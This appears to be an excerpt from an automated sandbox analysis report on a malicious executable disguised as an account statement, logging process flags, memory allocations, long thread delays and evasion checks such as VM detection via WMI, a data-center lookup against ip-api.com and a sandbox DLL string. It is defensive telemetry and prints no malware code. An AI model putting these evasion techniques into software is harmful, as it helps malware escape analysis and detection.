                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 1780000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 6560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 7560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 7690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 8690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 8D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: 9D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: AD20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeMemory allocated: BD20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4F00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 58E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 68E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 6A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 7A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 7DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 8DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: 9DD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeMemory allocated: ADD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: C90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2A40000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: EE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3944Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1133Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2252Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8186
                    Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe TID: 936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 3944 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4892Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 572Thread sleep count: 235 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6920Thread sleep count: 1133 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6920Thread sleep count: 2252 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2676Thread sleep time: -99219s >= -30000sJump to behavior
